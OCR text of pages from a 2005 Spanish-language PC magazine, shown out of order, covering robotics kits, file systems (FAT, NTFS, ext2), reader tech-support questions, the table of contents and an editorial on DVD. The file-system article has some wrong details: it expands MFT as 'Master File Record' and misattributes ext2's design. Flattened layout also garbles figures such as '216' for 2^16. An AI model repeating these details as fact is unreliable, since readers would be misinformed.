La versión 2.0 ofrece las mismas características y funciones que la 3.0, excepto que trae un LED menos, no cuenta con el fotosensor, ni el CD, ni el cable; pero existe un kit de conexión que se vende por separado que incluye el CD, el cable y un mouse pad de regalo, que permite realizar una actualización de la versión 2.0.

PROGRAMACION El kit incorpora casi 30 programas, entre los que se destacan los que permiten impartirle instrucciones por medio de la voz, realizar cuentas y escribir los resultados, o desafiar la inteligencia del usuario mediante juegos de ingenio en una competencia humano vs. robot, entre otros. Los programas incorporados, a su vez, sirven de inspiración para que el usuario que desee crear sus propios programas tenga una idea acerca de las capacidades de los robots que puede crear y programar. Para que el usuario cree sus propios programas, cuenta con dos aplicaciones para entorno Windows denominadas ControlBot y VisualBot, que vienen en el CD que acompaña al kit 3.0 o al kit de conexión de la versión 2.0. ControlBot es una aplicación intuitiva y muy sencilla de utilizar, lo que la vuelve especialmente apta para niños de corta edad. VisualBot ya es una herramienta de programación más avanzada y poderosa, de ambiente gráfico, destinada a niños de mayor edad o a estudiantes secundarios y de escuelas técnicas. Brinda total control sobre los motores y los sensores, y permite el manejo de variables, estructuras de decisión y de repetición. Una vez que el programa deseado se crea en la PC, se transfiere a la memoria del robot por medio de un cable que se conecta al puerto serie de la computadora. A continuación, el robot puede desconectarse de la PC y operar en forma totalmente autónoma. Los programas transferidos quedan almacenados en la memoria no volátil del robot, que es del tipo EEPROM, por lo que pueden volver a utilizarse aún después de haberlo apagado. El CD incorpora, además, un completo manual de instrucciones con varios programas de ejemplo que sirven como guía para iniciarse en el mundo de la programación. POWERUSR


58-59-Robotica-P26.qxd

11/7/05

16:20

Page 58

GONZALO MON / GONZALO ZABALA

.rob

DESARROLLADORES DE ROBOTS Y AUTOMATAS

gonzalo@mon.com.ar / gonzalo.zabala@vaneduc.edu.ar

«

UN KIT PARA INGENIEROS DE TODAS LAS EDADES

COMO CIERRE DE ESTA SERIE DE NOTAS REFERIDAS A KITS DE ROBOTICA, PRESENTAMOS EN ESTA ENTREGA LOS EXCELENTES KITS DE FISCHERTECHNIK, DESTACADOS POR LA CALIDAD Y EL REALISMO CON LOS QUE LOGRAN REPRESENTAR PROCESOS INDUSTRIALES.

FISCHERTECHNIK ischertechnik forma parte de un grupo industrial llamado Fischerwerke, cuya actividad central es la manufactura de componentes para la industria de la construcción y la industria automotriz, con sede en el sur de Alemania. Comenzó fabricando componentes para empresas de ingeniería que se utilizan en diseños de planta, y para modelar procesos e instalaciones, detectar fallas y entrenar a quienes los operan. En el surgimiento de Fischertechnik, su creador, Artur Fischer, trasladó la experiencia de su compañía en lo que se refiere a ingeniería y materiales, a la naciente empresa, con el fin de crear un sistema de modelaje de alta capacidad y calidad, que sirviera como un enlace entre la industria y la educación. Actualmente, está presente en todos los países desarrollados. Sus productos se utilizan con gran éxito en escuelas de Europa y los Estados Unidos, en los diferentes niveles, desde educación primaria hasta técnica y universitaria. Han demostrado ser un extraordinario vehículo para desarrollar la curiosidad y promover el aprendizaje. Incluso, la línea de kits de Entrenamiento y Demostración de Automatización Industrial se usa en los departamentos de diseño y desarrollo de las empresas manufactureras más reconocidas del mundo. Los modelos van desde los más simples mecanismos y vehículos (a partir de los cinco años), hasta los robots que interactúan con PCs o Macs por medio de un sencillo y (sin embargo) muy poderoso y completo software gráfico (orientado a objetos), y un versátil controlador programable (interfaz).

LOS KITS PRINCIPALES Entre sus kits de robótica podemos encontrar: ■ Industry Robots: Permite construir dos robots con movimiento en tres ejes, un robot de soldadura y un torno. Contiene cuatro motores, ocho interruptores y una lámpara. ■ Pneumatic Robots: Permite armar cuatro modelos distintos de máquinas manejadas neumáticamente. Estos son: un centro de procesamiento, una línea de clasificación, unas tenazas neumáticas, y un mecanismo para abrir y cerrar puer-

«

F

ROBOT CONSTRUIDO CON MECANISMOS NEUMATICOS.

tas. El kit incluye dos cilindros neumáticos, tres válvulas, dos motores, una barrera de luz y un sensor interruptor. ■ Robo Mobile Set: Sirve para construir ocho robots móviles, incluyendo uno que camina en seis patas, simulando un insecto, que puede moverse hacia adelante, atrás, derecha e izquierda. Otros modelos incluyen en su periferia la detección de obstáculos y la posibilidad de desarrollar un rastreador o “tracker”, capaz de seguir una línea negra. Este kit contiene dos motores de buen torque con relación de reducción de 50:1, cuatro sensores, dos fototransistores y una lámpara. ■ Bionic Robots: Permite armar robots que caminan con dos, cuatro o seis extremidades. Se mueven por medio de dos poderosos motores que les permiten desplazarse hacia adelante, atrás, derecha e izquierda. Las máquinas móviles perciben lo que ocurre a su alrededor por medio de varios sensores. ■ Computing Starter Pack: Este kit permite construir rápidamente modelos como semáforos, puertas corredizas, barreras levadizas de estacionamientos, secadoras o controles de temperatura. Contiene un motor, cuatro lámparas y numerosos sensores, incluyendo tres interruptores momentáneos de contacto, un fototransistor para construir una cortina de rayos de luz, un relevador que sirve como sensor magnético y un resistor para medir temperatura.

«

CARACTERISTICAS FISICAS Y ELECTRONICAS

58

AQUI OBSERVAMOS UN SIMPATICO ROBOT CAMINANTE, CONSTRUIDO CON EL KIT BIONIC ROBOTS.

El sistema constructivo de todos sus kits es modular, y está conformado por medio de bloques plásticos de gran precisión. Un aspecto para destacar es que las piezas de todos los kits son compatibles entre sí, sin importar la antigüedad. Fischertechnik asegura que no hubo cambios que produzcan incompatibilidad entre las piezas desde 1965. Con respecto al controlador programable, Fischertechnik lo hace con la Robo Interface, que está conformada por un microcontrolador de POWERUSR


50-55- Sist de Archivos-P26.qxd

11/7/05

15:56

JOSE ADRIAN LLIGOÑA BOSCH

.sft

TECNICO REPARADOR Y ADMINISTRADOR GNU/LINUX

jbosch78@argentina.com

«

ORGANIZACION DE DATOS DENTRO DE LA PC

Page 50

AL INSTALAR UN SISTEMA OPERATIVO, SE NOS PREGUNTA QUE SISTEMA DE ARCHIVOS DESEAMOS UTILIZAR, Y EN ESE MOMENTO COMIENZA EL DILEMA: ¿CUAL TIENE MEJOR RENDIMIENTO? ¿CUAL SE AJUSTARA A NUESTRAS NECESIDADES DE ALMACENAMIENTO? ¿CUAL TENDRA A SALVO NUESTROS DATOS ANTE UN IMPREVISTO? PARA AYUDAR EN ESA DECISION Y CONOCER MAS SOBRE COMO SE ORDENA LA INFORMACION, PREPARAMOS ESTE INFORME.

SISTEMAS DE

ARCHIVOS ntes de nada, debemos tener en claro qué es un sistema de archivos y para qué sirve. Un sistema de archivos es el modo en que un sistema operativo almacena la información en un medio, que puede ser un disco duro, un disquete, un CD, etc. Sus funciones son estructurar los datos, y asegurar su consistencia y recuperación ante errores en el sistema, de manera que la información que se lea sea idéntica a la que se escribió, todo esto de la forma más robusta y eficiente posible. Además de los datos, el sistema de archivos almacena información importante sobre los archivos y sobre el propio sistema de archivos, como fecha, permisos de acceso, propiedad, localización del archivo y tamaño. A estos datos se los conoce comúnmente con el nombre de metadatos. Teniento esto en claro, nos adentraremos ahora en la descripción de los diferentes sistemas de archivos usados en la actualidad y en la de aquellos que usamos hasta hace poco tiempo. Para hacerlo, comenzaremos hablando de los más populares, que son los que se usan en sistemas operativos Microsoft.

A

FAT La idea de la FAT (File Allocation Table, tabla de asignación de archivos) es dividir la distribución (layout) física del disco –que se separa en cilindros, cabezales y sectores (CHS)–, en unidades de asignación lógicas o clusters que se numeren, simplemente, desde 0 hasta X. El tamaño de los clusters varía según el sistema FAT utilizado y el tamaño del disco. 50

Un volumen FAT está compuesto por cuatro sectores básicos, puestos en este orden: Región reservada, Región FAT, Región de directorio raíz, y Región de datos de directorios y archivos. A continuación, describiremos cada una de ellas. REGION RESERVADA

En esta region, también conocida como Boot Sector o Sector 0, se encuentra el BPB (BIOS Parameter Block), que es el bloque encargado de definir los parámetros del volumen FAT (tamaño de cluster, tamaño del volumen, cantidad de bytes por sector, cantidad de sectores, etc.). Para sistemas FAT32 se agregó un campo más al BPB, que define parámetros propios de éste. REGION FAT

En esta sección (la tabla propiamente dicha) se lleva cuenta, en tiempo real, de qué cluster está siendo ocupado por cierto archivo. Cada entrada en la FAT representa un cluster. Esta tabla apunta directamente al comienzo del archivo por posición, y en su contenido tiene el número del siguiente cluster donde está el archivo, hasta que se indica el fin del archivo. Por ejemplo, supongamos que en un disco están libres los clusters 95, 101 y 200, cuya longitud es de 6 KB. Si tenemos un archivo de 13 KB, ocupará 3 clusters (de modo que desperdiciamos 5 KB del último). El sistema de archivos asignará la primera parte del archivo al cluster 95. Dentro de la tabla FAT, en la posición 95, existirá un numero que apunte a la 101 (en la 101 física del disco se grabará la segunda parte

TAMAÑOS DE CLUSTER EN SISTEMAS FAT TAMAÑO DE LA PARTICION < 128 MB 128 MB - 256 MB 256 MB - 512 MB 512 MB - 1 GB 1 GB - 2 GB 2 GB - 8 GB 8 GB - 16 GB 16 GB - 32 GB 32 GB - 2 TB

TAMAÑO DEL CLUSTER FAT 16 FAT 32 2 KB No 4 KB soportado 8 KB 16 KB 4 KB 32 KB No soportado

8 KB 16 KB 32 KB

del archivo); y en la posición 101 de la FAT, se grabará un numero que apunte a la 200 (en cuya posición física del disco se grabará la tercera y última parte del archivo). Igualmente, en la FAT, en la posición 200 se grabará una marca que indica que ha terminado el archivo en dicho cluster. Como podemos ver, esto permite la fragmentación, porque cuando se va a leer o recuperar un archivo, se consulta esta tabla y se va ingresando en memoria cluster por cluster, no en orden de contigüidad, sino en el orden que dicta la tabla. REGION DE DIRECTORIO RAIZ Y REGION DE DATOS DE DIRECTORIOS Y ARCHIVOS

En la región de Directorio raíz se establece el “punto raíz” del sistema de archivos. En la siguiente, se encuentran los archivos propiamente dichos, referenciados por la tabla del sector 1. En un primer momento, en los tiempos de nuestro querido DOS (Disk Operating System), el sistema de archivos era FAT16, dado que utilizaba 16 bits como medida de direccionamiento (también FAT12 para disquetes y discos de menos de 20 MB), y la cantidad máxima de clusters era, justamente, de 216 (unos 65535, empezando desde el 0). En FAT16, el tamaño máximo del cluster ocupaba 128 sectores de 512 bytes (512*128=65536-1=65535), y el máximo de una partición era de 2 GB. Con la aparición de Windows 95, se siguió utilizando FAT16, pero de un “modo extendido” llamado VFAT, que permitió, por primera vez, utilizar nombres largos de archivo. POWERUSR


50-55- Sist de Archivos-P26.qxd

11/7/05

15:56

Page 51

FAT32 Este sistema hizo su aparición en la versión OSR2 (OEM Service Release 2) de Windows 95. Aplica el mismo principio que FAT16, pero se extendió el registro a 32 bits, agregándole un campo a la tabla FAT. Además, permite el uso de nombres largos de archivo, en forma nativa. Con la inclusión de un nuevo campo, se aseguró la compatibilidad hacia atrás, ya que sólo había que ignorar ese campo en sistemas que no soportasen FAT32.

NTFS El sistema de archivos NTFS (New Technology File System) hizo su aparición en 1993 con la introducción de Windows NT 3.5. Hasta la llegada de Windows XP, en donde se adopta NTFS como sistema de archivos predeterminado (pudiendo elegir también FAT32 a costa de perder caracteristicas avanzadas), todas las versiones de Windows “comunes” manejaban particiones FAT pero no podían acceder a particiones NTFS. En cambio, todas las versiones de Windows NT (excepto NT 4.0, que no puede manejar FAT32) son capaces de acceder a particiones FAT. NTFS sigue usando clusters como unidad de almacenamiento, que puede tener un tamaño de 512 bytes a 64 KB. Típicamente, se toma como estándar un tamaño de 4 KB por cluster, lo que hace que se reduzca el espacio desperdiciado. Un volumen NTFS se divide de la forma descripta en la imagen correspondiente. Los primeros 16 sectores de un volumen NTFS se reservan para el Boot Sector, en donde se indica la localización de la MFT. En este sistema, todo se considera un archivo. Dentro de esta estructura, el archivo más importante es el llamado MFT (Master File Record, registro maestro de archivos), una tabla que se divide en registros de tamaño fijo (comúnmente 1 KB), cada uno de los cuales corresponde a un archivo. Los primeros 16 archivos son especiales, y cada uno se encarga de un aspecto de la operación del sistema. Una copia de éstos se localiza en la mitad del volumen NTFS, para mayor seguridad. El resto puede ser fragmentado y guardado en cualquier posición del disco, lo que evita que, ante un error físico en la MFT, el sistema no pueda ser accesible. Podríamos considerar que un volumen NTFS se divide en dos partes: el 12% del disco se asigna a la MFT (incluyendo su espacio reservado) y el 88% restante, a almacenar los archivos. Toda la información de un archivo (incluyendo nombre, tamaño, posición de los clusters que lo componen, etc.) se almacena en un registro. En caso de que el espacio sea insuficiente para almacenar toda la información, se usarán otros registros, que no necesariamente deben ser contiguos. Si se da el caso de que un archivo no contiene datos o es muy pequeño, el sistema lo almacena en el primer registro libre en la MFT.

puedan ser accedidos desde otro sistema. EFS cifra todos los archivos solicitados mediante una FEK (File Encrypting Key, clave para el cifrado de archivos). Esta clave, a su vez, se cifra mediante la clave de usuario, con lo cual se crea un campo DDF (Data Decrypting Field, campo para el descifrado de datos). También es posible solicitar una clave a un agente de seguridad designado (denominada Agente de Recuperación), y utilizarla para cifrar la clave FEK de forma separada y generar un campo DRF (Data Recovery Field, campo para la recuperación de datos). Los Agentes de Recuperación suelen transmitirse a un administrador, de modo que éste pueda descifrar y recuperar los datos como la haría el usuario que los cifró. Gracias a esto, se evita que los usuarios cifren los datos sin que la compañía pueda llegar a recuperarlos en un momento dado. Puntos de reanálisis: Los programas (Windows incluido) lo utilizan para capturar operaciones efectuadas sobre objetos contenidos en una estructura NTFS, y para ejecutar código del programa antes de devolver los datos del archivo al usuario o antes de ejecutar una aplicación.

■ Uniones de directorios: Son directorios NTFS que Windows 2000 asocia a un tipo especial de punto de reanálisis. Dichos puntos permiten configurar un directorio NTFS determinado para que apunte a otro directorio NTFS, aunque esté situado en otro volumen, pero siempre que éste pertenezca al mismo sistema. ■ Puntos para el montaje de volúmenes: Son objetos del sistema de archivos que utilizan puntos de reanálisis para establecer la correlación entre una carpeta NTFS y un volumen entero (es decir que, a diferencia de la unión de directorios, la correlación se aplica a todo un volumen). Los puntos de montaje permiten al usuario y al administrador ampliar la capacidad de un volumen sin necesidad de migrar los datos o de volver a definir las particiones del volumen.

CARACTERISTICAS TECNICAS

Entre las características de este sistema de archivos, haremos una breve reseña de las más importantes: ■ Encriptación: Con EFS (Encrypting File System, sistema de cifrado de archivos) es posible encriptar carpetas o archivos individuales para que no ESTRUCTURA DE UN VOLUMEN NTFS ZONA MFT ESPACIO RESERVADO PARA EL CRECIMIENTO DE LA MFT

ESPACIO PARA ARCHIVOS

MFT

POWERUSR

ESPACIO PARA ARCHIVOS

COPIA DE LOS PRIMEROS 16 REGISTROS DE LA MFT

■ Cuotas de disco: Con ellas se puede asignar un máximo de espacio en disco a cada usuario e, incluso, notificar si éste supera un nivel de advertencia intermedio. Las cuotas son transparentes para los usuarios, quienes, simplemente, ven la cantidad de espacio libre en el disco. A su vez, las aplicaciones que se ejecutan en el sistema del usuario no detectan la información relativa al espacio libre real y, por lo tanto, no crean archivos temporales o de caché cuyos tamaños están en función de la cantidad de disco disponible. ■ Archivos

dispersos: Son archivos de gran tamaño, pero sin muchos datos. Cuando se utilizan los servicios de los archivos dispersos, el sistema sólo asigna espacio en el disco duro para un archivo en las regiones donde éste contiene datos que no sean ceros. NTFS 51


11/7/05

15:56

DE ESTA FORMA SE ESTRUCTURA UN DISCO CON EXT 2/3.

sólo almacenará información acerca del rango que contiene ceros, la que describe dónde se reubicarán los datos dispersos. ■ Diario de cambios: Es una base de datos que contiene una lista con cada archivo o directorio que se ha modificado en un volumen NTFS específico, donde se van detallando todos los cambios aplicados en ese volumen. Para mantener el tamaño del diario de cambios dentro de lo razonable, Microsoft lo diseñó siguiendo un esquema circular: al cabo de cierto tiempo, los datos nuevos se escriben sobre los antiguos (cada entrada del archivo de anotaciones ocupa unos 80 bytes). El diario de cambios registra aspectos como la modificación y la eliminación de archivos. Sin embargo, estas entradas sólo hacen referencia a las operaciones más generales realizadas sobre los archivos, y nunca, a los datos que éstos contienen.

NTFS implementa lo que se llama “transacciones”, que no es más que llevar un registro de todas las operaciones realizadas sobre los archivos y, en caso de error en el sistema, realizar todas las “transacciones” que no pudieron efectuarse cuando se reinició el equipo.

SISTEMAS DE ARCHIVOS EN GNU/LINUX Ahora, pasemos a ver algunos sistemas de archivos que pueden implementarse en GNU/LINUX. Antes de nada, debemos diferenciar, en este caso, dos tipos de sistemas de archivos: sin journaling y con journaling (transaccionales). ¿A qué nos referimos con journaling y transaccionales? Los sistemas transaccionales, o con journaling (debido a que el archivo en donde se registran las transacciones se llama journal), hacen uso de un archivo en donde se van 52

Page 52

«

registrando las transacciones (operaciones) realizadas sobre el disco. Con esto se gana integridad en los datos, ya que ante una eventual caída del sistema antes de que la entrada en el log hubiese sido efectuada con éxito, los datos originales todavía aparecerían intactos en el disco, y solamente se perderían los cambios más recientes. Si la caída se diera justo durante la actualización real del disco (es decir, después de que la entrada en el log se hubiera dado), la entrada en el journal mostraría lo que, supuestamente, debería haber ocurrido, y cuando el sistema arrancara otra vez, podría, simplemente, rehacer las entradas en el journal y completar la actualización interrumpida. Entre los sistemas sin journaling, el más importante es EXT2, y no hay mucho que discutir al respecto. En cambio, en sistemas con journaling es donde se libra la batalla por ser el que ofrece mayor rendimiento y performance, seguridad, etc. Entre los más importantes de este tipo están EXT3, ReiserFS, XFS y JFS.

EXT2 El clásico sistema EXT2 (diseñado por Wayne Davidson y Stephen Tweedie) es una mejora del sistema EXT (ideado por Remy Card) y ha sido utlizado durante muchísimo tiempo en las más conocidas distribuciones de Linux, a fines de la década de 1990. EXT2 divide lógicamente el disco en grupos de bloques de un tamaño fijo al crearse el sistema de archivos. La información crítica del sistema está alojada en el llamado Superbloque. Aunque sólo el Superbloque del Grupo de bloque 0 es leído al inicio del sistema, se almacena una copia de él en los diferentes grupos de bloques, por seguridad ante eventuales desastres.

PISTAS

BACKUP SUPERBLOQUE

BLOQUEO CERO SUPERBLOQUE

SECTORES 512 BYTES

CLUSTERS/BLOQUES

El Descriptor de Grupo de Bloques almacena la información propia del Grupo de bloques como localización de la Tabla de inodos, y del Bitmap de Bloques e inodos. Por seguridad, también se almacena un duplicado de esta información en cada Grupo de bloques del sistema. Los inodos describen qué bloques de datos ocupa un archivo, como así también, su propietario, atributos, timestamp (fecha de creación y modificación del inodo), etc. Es decir, el inodo almacena los metadatos de los archivos y directorios. En los diferentes Bitmaps (Bitmap de bloque y Bitmap de inodos) se almacenan los bloques de datos o inodos que están ocupados y los que se encuentran disponibles. En caso de una caída del sistema, e2fsck inicia un análisis de los datos del sistema de archivos. Los metadatos se reconstruyen, y los archivos o bloques de datos que quedan sueltos se guardan en un directorio especial denominado lost+found, que se encuentra ubicado en la raíz del disco. A diferencia de los sistemas de archivos transaccionales, e2fsck analiza todo el sistema y no sólo los bits de metadatos modificados, por lo que lleva mucho tiempo recuperar el sistema, y no se recomienda para servidores en donde se necesite alto rendimiento.

GRUPO DE BLOQUE 0

SUPER BLOQUE

DESCRIPTOR DE GRUPOS

«

50-55- Sist de Archivos-P26.qxd

GRUPO DE BLOQUE N-1

BLOQUE BITMAP

INODO TABLA DE BITMAP INODOS

GRUPO DE BLOQUE N

BLOQUES DE DATOS

ESTRUCTURA DEL SISTEMA DE ARCHIVOS EXT2 EN DONDE SE VE UN “GRUPO DE BLOQUES” EN DETALLE.

POWERUSR


38-39-Soporte Tecnico-P26.qxd

.rta

11/2/05

3:58 PM

El mismo día en el que se inventó la PC, aparecieron todos los problemas posibles relacionados con estas máquinas. Para hacer frente a las calamidades de esta caja de Pandora, se creó el valeroso servicio de soporte técnico.

S+T

PLACAS DE VIDEO

GEFORCE 6600 “A SECAS”

[

[SOPORTE +TECNICO HARDWARE

ENCENDER UNA FUENTE AT SIN CARGA

?

Hola, genios de las USERS. Mi pregunta, más que técnica, es ecológica. El tema es que tengo un par de fuentes de alimentación AT en desuso y quisiera usarlas. Por eso, con una lectora de CD vieja (4x) y un amplificador, armé un reproductor para el taller y entonces surgió mi problema: conecté la fuente a la lectora y, a pesar de que anda si la conecto a un mother, fuera del gabinete no enciende. Me dijeron que tenía que puentear el conector para hacerle creer que está alimentando un mother, pero por más que busco, no consigo un diagrama de conexión. Por favor, ¡ustedes son mi última esperanza! No sólo yo voy a estar agradecido, ya que si esto funciona bien, voy a poder armar otra fuente para el colegio de mi hijo, que, como es estatal, necesita el apoyo de los padres para solucionar sus necesidades. Desde ya, muchas gracias por su respuesta. Sergio Moscovich

+

La mayoría de las fuentes de alimentación del tipo AT tienen un sistema de protección mediante el cual, si no detectan suficiente carga en su salida de 5 V (algo superior a 1 A), no encienden. Esto es, fundamentalmente, por una cuestión de protección de los dispositivos conectados, ya que si no se las carga lo suficiente, la línea de 5 V puede subir a valores bastante mayores que los nominales. Por lo tanto, la solución más sencilla a tu problema es conectar a la línea de 5 V (es decir, entre un cable rojo y uno negro) un elemento que consuma lo suficiente; una opción rápida puede ser un disco duro antiguo que no funcione. También se nos ocurre que se podría usar un resistor de potencia (refrigerado por un disipador) en serie con un LED adecuado, lo cual tendría una cierta utilidad, puesto que podría servir como un indicador de “Power On”. EN GENERAL, LAS FUENTES DE ALIMENTACION DEL TIPO AT REQUIEREN DE UNA CIERTA CANTIDAD DE CARGA EN SU LINEA DE 5 V PARA ARRANCAR, SUPERIOR A 1 A.

38

Page 38

?

¡Buenas! Primero quiero decirles que la revista está buenísima. ¡Un 80 por ciento de lo que sé es gracias a ustedes! Acá van mis dudas: 1) Consigo una ASUS GeForce N6600 con 256 MB. ¿Es buena para los juegos actuales? ¿No importa que sea AGP de 8x? ¿Se puede overclockear? 2) Tengo una placa de video MSI GeForce FX 5200 con 128 MB. ¿Es buena? (la compré porque necesitaba una urgente...) ¿Se puede overclockear? 3) Quiero comprarme una nueva compu. Pensaba ponerle un Celeron D de 2,66 GHz (LGA 775) con un mother PC Chips M985G, que cuesta entre U$S 80 y 90. ¿La combinación es buena? ¿Qué placa me recomendarían para ese combo? Gracias por sus respuestas. Hitomi250 Sadamoto (!)

+

Las placas con GeForce 6600 representan, hoy en día, una buena relación entre el dinero invertido y la performance obtenida, por lo cual, con precios que rondan los U$S 150, son más que recomendables. La frecuencia de trabajo de la GPU es de 300 MHz (200 menos que la 6600 GT), y a menudo no tiene mayores complicaciones para conseguir unos 400 MHz, con lo cual se acerca bastante al modelo más caro. Con respecto a la memoria, ASUS en particular utiliza chips de 500 MHz para la versión de 256 MB y 550 MHz para la de 128 MB. Por este motivo, te recomendamos adquirir la versión de 128 MB, ya que en placas de esa gama no suele observarse diferencia entre una y otra cantidad de memoria. Por cierto, la interfaz AGP 8x no es un factor limitante en el rendimiento para ese tipo de placas (recién puede comenzar a serlo en las placas de la familia 6800). Con respecto a tu actual GeForce FX 5200, te contamos que nuestras experiencias de overclocking no fueron las mejores: en general, no se puede obtener más de 300 MHz para la GPU (contra los 270 nominales). El overclock de la memoria dependerá, principalmente, del modelo exacto de tu placa, pero no suele haber un incremento muy grande en tarjetas de esa clase (donde los fabricantes tratan de ahorrar el máximo posible con la memoria). Finalmente, hablando del combo para tu próxima PC, podemos decir que es bastante bueno, en especial, por el motherboard, que tiene un excelente precio y un muy buen rendimiento (y capacidades de overclock). Sin embargo, viendo que te gustan mucho los juegos, creemos que sería más adecuado colocar un procesador de la línea Sempron (Palermo) de Socket 754 con algún motherboard que traiga PCI Express, como el MSI K8N Neo3-F (analizado en la edición anterior).

CON UN PRECIO QUE RONDA LOS U$S 150, LAS GEFORCE 6600 RESULTAN INTERESANTES POR TRES MOTIVOS: SON ECONOMICAS, FUNCIONAN BIEN EN LA MAYORIA DE LOS JUEGOS ACTUALES Y SOPORTAN SLI (LAS DE INTERFAZ PCIE)

POWERUSR


02-Sumario-P26.qxd

11/7/05

14:43

Page 2

Gacetillas de prensa redaccion@mpediciones.com Para anunciar publicidad@mpediciones.com Atención al lector lectores@mpediciones.com

AÑO III NUMERO 26

Opiniones y sugerencias power@mpediciones.com Para suscribirse usershop.tectimes.com Comunidad de lectores foros.tectimes.com

« DVD: BUEN MEDIO, MAL FORMATO

SUMARIO POWERNEWS 4 NVIDIA presenta su nueva GPU integrada en mothers, AMD inaugura su planta, ATI mejora el rendimiento con un tweaker… ECS KN1 SLI 10 De la mano de ECS nos llega un nuevo mother con nForce4 SLI para Athlon 64 de Socket 939. CORSAIR XMS2-5400UL 12 Probamos uno de los mejores kits de memoria DDR2, ideales para realizar overclocking.

AUTOPSIA 36 Este mes: el pisapapeles más grande del mundo. SOPORTE TECNICO 38 Respondemos las dudas de nuestros inquietos lectores. TWEAKS 40 Consejos y tips para la PC. SISTEMAS DE REFRIGERACION POR AGUA 44 Fundamentos técnicos del famoso sistema de watercooling.

SAPPHIRE RADEON X550 14 La nueva apuesta de ATI en la gama baja.

MICRO CONTROLADORES 46 Hacemos un programador de PIC16F84 y desarrollamos nuestro primer proyecto.

NOVATECH DDR 333/256 MB 16 Un módulo de memoria económico, con sorprendentes habilidades de overclocking.

SISTEMAS DE ARCHIVOS 50 Un completo informe sobre cómo se almacena la información en los distintos sistemas operativos.

SAMSUNG SPINPOINT SP1213C 16 Un disco suro de 120 GB, muy silencioso.

ROBOTICA 56 En esta oportunidad, vemos el kit Blocky-Tronic y el de Fischertechnik.

HERRAMIENTAS 18 En esta sección, mostramos el mejor software para aprovechar la PC.

EXPLOTANDO CON METASPLOIT 60 Un ejemplo práctico del uso de un framework para la explotación de un servidor.

CODECS 22 Cómo funciona la compresión digital de audio y de video.

LO QUE VIENE 64 El novedoso control del Nintendo Revolution.

COLABORADORES

«

ANDRES FIOROTTO | andres@mpediciones.com ARIEL PALAZZESI | arielpalazzesi@yahoo.com.ar GONZALO MON | gonzalo@mon.com.ar GONZALO ZABALA | gonzalo.zabala@vaneduc.edu.ar JOSE ADRIAN LLIGOÑA BOSCH | jbosch78@argentina.com LEANDRO REOX | leandro.reox@gmail.com NESTOR LOPEZ | www.oc-squadron.com PABLO NAJIMOVICH | naji@mpediciones.com PATRICIO BARBOSA | patriciojb@gmail.com

2

Podría decir que mi experiencia con las películas en DVD es bastante reciente, ya que no fue hasta la popularidad de este formato en América Latina que comencé a mirar películas codificadas en MPEG-2. Al principio, estaba maravillado por la calidad del sonido, ya que se oía realmente muy bien. El video también era bastante bueno, aunque si rippeaba alguna película en un DVD-R de 4,7 GB, se notaban ciertas imperfecciones. Un día, llevé una a la casa de un amigo y nos dispusimos a verla en su monitor de 14 pulgadas, a 2 metros de distancia. Nos costaba un poco visualizar los subtítulos (blancos y sin bordes, de ésos que suelen confundirse con el fondo), así que decidimos cambiarle el color, y aumentar el tamaño de la tipografía. Pasamos un buen rato buscando en PowerDVD alguna opción para modificar los subtítulos, pero no la encontramos; instalamos WinDVD, pero tampoco logramos nuestro cometido. Así, descubrimos que los subtítulos son imágenes superpuestas a la escena y no se pueden modificar. Finalmente, tuvimos que sentarnos más cerca de la pantalla y mirar la película con algo de incomodidad. Parece que los desarrolladores del DVD gastaron más sus cerebros en pensar cómo evitar la piratería, que en buscar un formato versátil que permitiera una mejor interacción con el usuario, y mayor calidad de audio y video. Además, su método anticopia y la división del mundo en regiones no son más que molestias, incluso, para los usuarios que compran los discos legalmente. Por otro lado, la calidad no es tan buena; formatos de compresión como DivX permiten obtener calidades similares con un tercio del espacio que ocupa un DVD. Eso sí: cuando hablo del DVD, me refiero al formato de video; no al medio en sí, que me parece muy bueno debido a su relación entre capacidad, tamaño y velocidad de acceso. Además, ahora se suma el costo, que es bastante bajo y conveniente frente a cualquier otro medio actual. El DVD no está a la par de los algoritmos actuales, que seguramente lo reemplazarán en un futuro. ¿Y cuándo llegará un nuevo formato “oficial” para las películas? No lo sé, pero, sin duda, será dentro de un buen tiempo, pues quedan muchos reproductores MPEG-2 por vender… Ariel Gentile | genaris@mpediciones.com Asesor Editorial General Gabriel Pleszowski

Asesor Comercial Benito de Miguel

POWERSTAFF Coordinador Editorial Miguel Lederkremer

Asesor Editorial Fernando Casale

Redacción Ariel Gentile

Asesora de Corrección Magdalena Porro

Asesor de Diseño Frank Sozzani

Asesor de Diseño Flavio Burstein

Diseño Laura Heer

Diagramación Juan Pablo Gurzi

Publicidad: (54-11) 4959-5000; fax: (54-11) 4954-1791; publicidad@mpediciones.com ❚ Distribuidores: Argentina (Capital): Vaccaro Sánchez y Cía. C.S. - Moreno 794 piso 9 (1091), Ciudad de Buenos Aires | Argentina (Interior): DISA – Pte. Luis Sáenz Peña 1836 | Chile: Distribuidora Vía Directa S.A., Riquelme Nº 840, Santiago, tel. 688-7383 | México: CITEM S.A. de C.V. - Av. del Cristo No. 101 Col. Xocoyahualco Tlalnepantla, Estado de México | Bolivia: Agencia Moderna Ltda. General Acha E-0132 - C. de correo 462 - Cochabamba - Bolivia - tel. 005914-422-1414 | Uruguay: Espert SRL – Ciudadela 1416, Montevideo | Venezuela: Distribuidora Continental Bloque de Armas - Edificio Bloque de Armas Piso 9°, Av. San Martín, cruce con final Av. La Paz, Caracas. | Paraguay - Selecciones S.A.C. Coronel Gracia 225 - Asunción | Perú - Distribuidora Bolivariana - Av. República de Panamá 3635 - San Isidro, Lima POWER.TECTIMES.COM Todas las marcas mencionadas son propiedad de sus respectivos dueños. Impreso en Kollor Press S.A. Uruguay 124, Avellaneda, Bs.As. Copyright © MMV MP Ediciones S.A., Moreno 2062, C1094ABF, Ciudad de Buenos Aires, Argentina. Tel.: (54-11) 4959-5000. Fax: (54-11) 4954-1791. E-mail: correo@mpediciones.com. Hecho el depósito que marca la ley. Esta publicación no puede ser reproducida, ni en todo ni en parte, ni registrada en o transmitida por un sistema de recuperación de información, en ninguna forma ni por ningún medio, sea mecánico, fotoquímico, electrónico, magnético, electroóptico, por fotocopia o cualquier otro, sin el permiso previo y por escrito de esta casa editorial. ISBN 987-526-336-2 Codecs / coordinado por Lederkremer Miguel - 1a ed. - Buenos Aires : MP Ediciones, 2005. v. 25, 64 p. ; 28x0 cm. 1. Programación. I. Miguel, Lederkremer, coord. CDD 005.3

POWERUSR


40-Tweaks-P26.qxd

11/2/05

4:11 PM

Page 40

FIREFOX

GUARDAR (CASI) CUALQUIER ARCHIVO MULTIMEDIA

»

